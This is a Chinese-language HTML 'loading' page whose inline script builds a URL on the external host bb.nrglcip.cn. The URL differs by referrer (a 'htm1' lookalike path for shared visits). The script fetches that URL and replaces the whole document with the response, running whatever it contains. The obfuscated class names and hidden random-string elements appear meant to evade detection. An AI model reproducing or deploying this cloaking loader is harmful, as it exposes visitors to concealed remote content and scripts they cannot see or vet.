<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Ehuhw3 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Ehuhw3 .Z0yUJeDAqnz {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Ehuhw3 .content {
            line-height: 50px;
            text-align: center
        }

        .Ehuhw3 .img {
            width: 100%
        }

        .Ehuhw3 .FHwH9Bj4O {
            text-align: center
        }

        .Ehuhw3 .FHwH9Bj4O span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Ehuhw3 .FHwH9Bj4O span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Ehuhw3 .FHwH9Bj4O span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Ehuhw3 .FHwH9Bj4O span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Ehuhw3 .FHwH9Bj4O span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Ehuhw3 .FHwH9Bj4O span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Ehuhw3 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Bjaotn9kme(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var yhGDG = Bjaotn9kme('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ yhGDG +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ yhGDG +".html?a=share";
		}
		
        Wxxx529LmV=url+"#"+new Date().getTime();
        Wxxx529LmV && function() {
            $.get(Wxxx529LmV, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>Qm8VeDVaP8olMYooPIWlw3Pe5tyx53Smg6yCvx4dC</p>
<p  style='display:none'>Qm8VeDVaP8olMYooPIWlw3Pe5tyx53Smg6yCvx4dC</p>
<b style='display:none' >BaNJWq18Ft0DFKvHUZ1dOU4TWsbbwEYZkmrz3pB2NhRrMRimLlmsp870H6DbbkpBJHdtlENiaVg4yr1yuJqz98jei3VY</b>
<span style='display:none'>Re0zbpwMeRMpGuGQ0mNjTp08kOK7F0lINwwgJaDi0uCiel1p5KVKjtRi5FUgj7Uck2PAbJTyhGTZ02TfGL34Gi2</span><div class="Ehuhw3">
    <div class="Z0yUJeDAqnz">
        <div class="FHwH9Bj4O">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>PHN8OPjvzJwgRIgKACRk1fR8WI1IvAWYKyHqXSto8hdWLCHyPINuZTGiSPClbwFxUUHdl5zOAwPzg6L9jwacFCjDianATq58</div>
<ul style='display:none' >NZGbGc8CsGRdSnqpB3spnXMrJu1l</ul>
<div style='display:none'>PHN8OPjvzJwgRIgKACRk1fR8WI1IvAWYKyHqXSto8hdWLCHyPINuZTGiSPClbwFxUUHdl5zOAwPzg6L9jwacFCjDianATq58</div>
<a  href='#' style='display:none'>m9ueClFKy4yRtr3GDrIynJLSnTDktOkti8HhVfgikiCrOQ5EofXHw4fyNltlCDjPSxpKZ3SNA</a>
<img  src='' style='display:none'>
<span style='display:none'>Nbr3MknzVCScUcrnaDBMY</span></body>
</html>